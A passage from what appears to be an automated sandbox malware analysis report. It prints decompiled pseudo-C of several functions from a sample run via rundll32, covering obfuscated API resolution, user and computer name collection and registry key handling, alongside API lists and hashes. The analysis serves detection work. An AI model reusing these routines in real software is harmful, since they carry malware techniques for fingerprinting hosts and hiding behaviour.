                                          • Instruction Fuzzy Hash: 1C519FB0B10254EEEB10EAB8ED88E6B72EDEF8C714B647915AC01D7118FA74FD408621
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 043513B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 043513C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 043513DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04351443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04351452
                                          • SysFreeString.OLEAUT32(00000000), ref: 0435145D
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: f399240b21f69fba72aed33b12e7173330e19fe5c1ef164a3578461d5901b3ce
                                          • Instruction ID: 9d44c7ff8cf1e902ff1d773bcf0c0160383e0195b16560e51336ff572f48a9dd
                                          • Opcode Fuzzy Hash: f399240b21f69fba72aed33b12e7173330e19fe5c1ef164a3578461d5901b3ce
                                          • Instruction Fuzzy Hash: BC415E76D00609ABDF01EFF8D844AAEB7B9EF49304F246425ED14EB120DA71ED05CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043557D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E043557D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E043558BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x435d2a4; // 0x251a5a8
					_t1 = _t23 + 0x435e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x435d2a4; // 0x251a5a8
					_t2 = _t26 + 0x435e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0435147E(_t54);
					} else {
						_t30 =  *0x435d2a4; // 0x251a5a8
						_t5 = _t30 + 0x435e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x435d2a4; // 0x251a5a8
							_t7 = _t33 + 0x435e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x435d2a4; // 0x251a5a8
								_t9 = _t36 + 0x435e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x435d2a4; // 0x251a5a8
									_t11 = _t39 + 0x435e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04357B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x043557e7
                                          0x043557eb
                                          0x043558ad
                                          0x043557f1
                                          0x043557f1
                                          0x043557f6
                                          0x04355809
                                          0x0435580b
                                          0x04355810
                                          0x04355818
                                          0x0435581f
                                          0x04355821
                                          0x04355826
                                          0x043558a5
                                          0x043558a6
                                          0x04355828
                                          0x04355828
                                          0x0435582d
                                          0x04355835
                                          0x04355837
                                          0x0435583c
                                          0x00000000
                                          0x0435583e
                                          0x0435583e
                                          0x04355843
                                          0x0435584b
                                          0x0435584d
                                          0x04355852
                                          0x00000000
                                          0x04355854
                                          0x04355854
                                          0x04355859
                                          0x04355861
                                          0x04355863
                                          0x04355868
                                          0x00000000
                                          0x0435586a
                                          0x0435586a
                                          0x0435586f
                                          0x04355877
                                          0x04355879
                                          0x0435587e
                                          0x00000000
                                          0x04355880
                                          0x04355886
                                          0x0435588b
                                          0x04355892
                                          0x04355897
                                          0x0435589c
                                          0x00000000
                                          0x0435589e
                                          0x043558a1
                                          0x043558a1
                                          0x0435589c
                                          0x0435587e
                                          0x04355868
                                          0x04355852
                                          0x0435583c
                                          0x04355826
                                          0x043558bb

                                          APIs
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,043514AF,?,?,?,?,00000000,00000000), ref: 043557FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0435581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04355835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0435584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04355861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04355877
                                            • Part of subcall function 04357B01: memset.NTDLL ref: 04357B80
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 33d3171bd4ea9e0098c870f91a02c95dfc5602bf77b43783474e51928a905df1
                                          • Instruction ID: ae241d6d30213696c288c6e9c89e399cf914c40ef2be79c61a5477d802598a1d
                                          • Opcode Fuzzy Hash: 33d3171bd4ea9e0098c870f91a02c95dfc5602bf77b43783474e51928a905df1
                                          • Instruction Fuzzy Hash: 8C2171B1B0070AEFEB11DF69D844D6AB7ECEF44314B05A425ED09DB260EB74FA058B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435A642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0435A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x435d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E0435A5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E0435621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E0435147E(_a8);
						goto L29;
					}
					_t65 =  *0x435d2a4; // 0x251a5a8
					_t16 = _t65 + 0x435e8de; // 0x65696c43
					_t68 = E0435A5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d0435c0
						if(E04354C9A( *_t33, _t96, _a8,  *0x435d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x435d2a4; // 0x251a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x435ea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x435ea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E043530FC( &_a24, _t73,  *0x435d334,  *0x435d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x435d2a4; // 0x251a5a8
									_t44 = _t75 + 0x435e856; // 0x74666f53
									_t78 = E0435A5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d0435c0
										E04351BC1( *_t47, _t96, _a8,  *0x435d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d0435c0
										E04351BC1( *_t49, _t96, _t103,  *0x435d330, _a16);
										E0435147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d0435c0
									E04351BC1( *_t40, _t96, _a8,  *0x435d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d0435c0
									E04351BC1( *_t43, _t96, _a8,  *0x435d330, _a16);
								}
								if( *_t105 != 0) {
									E0435147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d0435c0
					if(E043574B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d0435c0
							E04354C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E0435147E(_t104);
						_t102 = _a16;
					}
					E0435147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x435d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x0435a642
                                          0x0435a64b
                                          0x0435a652
                                          0x0435a657
                                          0x0435a6c6
                                          0x0435a6cc
                                          0x0435a6d1
                                          0x0435a6da
                                          0x0435a6df
                                          0x0435a6e4
                                          0x0435a858
                                          0x0435a85f
                                          0x0435a85f
                                          0x0435a864
                                          0x0435a866
                                          0x0435a866
                                          0x0435a86f
                                          0x0435a86f
                                          0x0435a6ea
                                          0x0435a6f6
                                          0x0435a84e
                                          0x0435a851
                                          0x00000000
                                          0x0435a851
                                          0x0435a6fc
                                          0x0435a701
                                          0x0435a70a
                                          0x0435a70f
                                          0x0435a714
                                          0x0435a75e
                                          0x0435a75e
                                          0x0435a771
                                          0x0435a77b
                                          0x0435a781
                                          0x0435a788
                                          0x0435a792
                                          0x0435a792
                                          0x0435a78a
                                          0x0435a78a
                                          0x0435a78a
                                          0x0435a78a
                                          0x0435a7b4
                                          0x0435a7bc
                                          0x0435a7ea
                                          0x0435a7ef
                                          0x0435a7f8
                                          0x0435a7fd
                                          0x0435a801
                                          0x0435a833
                                          0x0435a803
                                          0x0435a810
                                          0x0435a813
                                          0x0435a823
                                          0x0435a826
                                          0x0435a82c
                                          0x0435a82c
                                          0x0435a7be
                                          0x0435a7cb
                                          0x0435a7ce
                                          0x0435a7e0
                                          0x0435a7e3
                                          0x0435a7e3
                                          0x0435a83d
                                          0x0435a849
                                          0x0435a83f
                                          0x0435a842
                                          0x0435a842
                                          0x0435a83d
                                          0x0435a7b4
                                          0x00000000
                                          0x0435a77b
                                          0x0435a723
                                          0x0435a72d
                                          0x0435a72f
                                          0x0435a734
                                          0x0435a738
                                          0x0435a73a
                                          0x0435a745
                                          0x0435a748
                                          0x0435a748
                                          0x0435a74e
                                          0x0435a753
                                          0x0435a753
                                          0x0435a759
                                          0x00000000
                                          0x0435a759
                                          0x0435a65c
                                          0x00000000
                                          0x0435a683
                                          0x0435a68e
                                          0x0435a6a4
                                          0x0435a6aa
                                          0x0435a6b2
                                          0x00000000
                                          0x0435a6b2

                                          APIs
                                          • StrChrA.SHLWAPI(0435553C,0000005F,00000000,00000000,00000104), ref: 0435A675
                                          • memcpy.NTDLL(?,0435553C,?), ref: 0435A68E
                                          • lstrcpy.KERNEL32(?), ref: 0435A6A4
                                            • Part of subcall function 0435A5E9: lstrlen.KERNEL32(?,00000000,0435D330,00000001,0435937A,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?), ref: 0435A5F2
                                            • Part of subcall function 0435A5E9: mbstowcs.NTDLL ref: 0435A619
                                            • Part of subcall function 0435A5E9: memset.NTDLL ref: 0435A62B
                                            • Part of subcall function 04351BC1: lstrlenW.KERNEL32(0435553C,?,?,0435A818,3D0435C0,80000002,0435553C,04359642,74666F53,4D4C4B48,04359642,?,3D0435C0,80000002,0435553C,?), ref: 04351BE1
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0435A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: be44316e7091f3d9b2d26855e73217de915a092113f595b84d90b0371c643635
                                          • Instruction ID: 3516f3c608d2bce57e10c404fc09dd25494cf507dc524d41b40d456444199e9b
                                          • Opcode Fuzzy Hash: be44316e7091f3d9b2d26855e73217de915a092113f595b84d90b0371c643635
                                          • Instruction Fuzzy Hash: 84513B7250020AEFEF11AFA0DD40EAA7BBDEF08308F14A615FD1596570E735E926EB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0435614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0435614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E043558BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0435147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4355210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x04356158
                                          0x0435615b
                                          0x0435615e
                                          0x04356164
                                          0x04356169
                                          0x0435616f
                                          0x04356177
                                          0x0435617a
                                          0x04356180
                                          0x04356185
                                          0x04356192
                                          0x0435619f
                                          0x043561a3
                                          0x043561a5
                                          0x043561a9
                                          0x043561ac
                                          0x043561bc
                                          0x0435620f
                                          0x04356210
                                          0x043561be
                                          0x043561c3
                                          0x043561c4
                                          0x043561c9
                                          0x043561cc
                                          0x043561df
                                          0x00000000
                                          0x043561e1
                                          0x043561e4
                                          0x043561e9
                                          0x043561f7
                                          0x043561fa
                                          0x04356200
                                          0x04356205
                                          0x00000000
                                          0x04356207
                                          0x04356207
                                          0x0435620a
                                          0x0435620a
                                          0x04356205
                                          0x043561df
                                          0x04356215
                                          0x04356216
                                          0x04356185
                                          0x0435621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,0435520E), ref: 0435615E
                                          • GetComputerNameW.KERNEL32(00000000,0435520E), ref: 0435617A
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetUserNameW.ADVAPI32(00000000,0435520E), ref: 043561B4
                                          • GetComputerNameW.KERNEL32(0435520E,?), ref: 043561D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0435520E,00000000,04355210,00000000,00000000,?,?,0435520E), ref: 043561FA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 8a13f57c8fb67d78f8ef28ecfc21f234b6bc04a52202dcac89216ce90a12d9c9
                                          • Instruction ID: 22a29990062207e95c250c1260d78bd3f41ad102fc984f408cf09396681c7a07
                                          • Opcode Fuzzy Hash: 8a13f57c8fb67d78f8ef28ecfc21f234b6bc04a52202dcac89216ce90a12d9c9
                                          • Instruction Fuzzy Hash: B021E8B6900208FFDB11DFE8D985DEEBBBCEF48304B5054AAE905E7210E634AB44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 043562CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E043562CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x435d114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x435d238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x043562d5
                                          0x043562d8
                                          0x043562da
                                          0x043562e3
                                          0x043562f5
                                          0x043562f5
                                          0x043562f9
                                          0x043562fb
                                          0x043562fe
                                          0x04356301
                                          0x0435630a
                                          0x04356314
                                          0x04356318
                                          0x0435631d
                                          0x04356333
                                          0x04356337
                                          0x04356388
                                          0x04356339
                                          0x04356339
                                          0x04356341
                                          0x04356350
                                          0x04356355
                                          0x04356365
                                          0x0435636b
                                          0x04356376
                                          0x04356380
                                          0x04356384
                                          0x04356384
                                          0x04356337
                                          0x0435638f
                                          0x04356396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04356301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0435632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04356341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04356350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0435636B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 77016cf4e36a169dcd67e99cedf6af05b5469569a55451888e3b37b9ee81b0f1
                                          • Instruction ID: 03006e899a5207321ee4c81f02d9760b27e8d9cb2e7b001f0a8ecc4df10ae08e
                                          • Opcode Fuzzy Hash: 77016cf4e36a169dcd67e99cedf6af05b5469569a55451888e3b37b9ee81b0f1
                                          • Instruction Fuzzy Hash: 38218E76900209AFDB019FA8C845AEEBFB9EF85304F059054FC48AB325C735E915CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04359FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04359FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04356B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0435A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x435d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x04359fe7
                                          0x04359ff4
                                          0x04359ff6
                                          0x0435a059
                                          0x00000000
                                          0x0435a059
                                          0x0435a00e
                                          0x0435a015
                                          0x0435a021
                                          0x0435a026
                                          0x0435a028
                                          0x0435a02a
                                          0x0435a02c
                                          0x0435a02e
                                          0x0435a030
                                          0x0435a03c
                                          0x0435a04c
                                          0x00000000
                                          0x0435a03e
                                          0x0435a03e
                                          0x0435a045
                                          0x0435a052
                                          0x0435a052
                                          0x0435a052
                                          0x0435a045
                                          0x0435a03c
                                          0x0435a057
                                          0x00000000
                                          0x00000000
                                          0x0435a05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,043566AF,?,?,00000000,00000000), ref: 0435A021
                                          • ResetEvent.KERNEL32(?), ref: 0435A026
                                          • GetLastError.KERNEL32 ref: 0435A03E
                                          • GetLastError.KERNEL32(?,?,00000102,043566AF,?,?,00000000,00000000), ref: 0435A059
                                            • Part of subcall function 04356B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0435A006,?,?,?,?,00000102,043566AF,?,?,00000000), ref: 04356B7A
                                            • Part of subcall function 04356B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0435A006,?,?,?,?,00000102,043566AF,?), ref: 04356BD8
                                            • Part of subcall function 04356B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04356BE8
                                          • SetEvent.KERNEL32(?), ref: 0435A04C
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: b04da6594e0c51594bc777662d602172f1b024e92249f6b799e24f88ada10f4e
                                          • Instruction ID: 6834f3c4911d841e26381f60e4ce8fb936d82f38a378e76cc58cb91094f11ac0
                                          • Opcode Fuzzy Hash: b04da6594e0c51594bc777662d602172f1b024e92249f6b799e24f88ada10f4e
                                          • Instruction Fuzzy Hash: 24014B71110310AADB307A61DC44F6BB7ADFF48768F106B24FA51920F0D625F815EA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04356A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04356A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x435d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x435d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x435d258 = _t6;
					 *0x435d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x435d254 = _t7;
					if(_t7 == 0) {
						 *0x435d254 =  *0x435d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x04356a87
                                          0x04356a8d
                                          0x04356a94
                                          0x00000000
                                          0x04356aee
                                          0x04356a96
                                          0x04356a9e
                                          0x04356aab
                                          0x04356aab
                                          0x04356aeb
                                          0x00000000
                                          0x04356aeb
                                          0x04356aad
                                          0x04356aad
                                          0x04356ab2
                                          0x04356ac4
                                          0x04356ac9
                                          0x04356acf
                                          0x04356ad5
                                          0x04356adc
                                          0x04356ade
                                          0x04356ade
                                          0x00000000
                                          0x04356ae5
                                          0x04356aa7
                                          0x00000000
                                          0x00000000
                                          0x04356aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,043590D2,?), ref: 04356A87
                                          • GetVersion.KERNEL32 ref: 04356A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04356AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04356ACF
                                          • GetLastError.KERNEL32 ref: 04356AEE
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
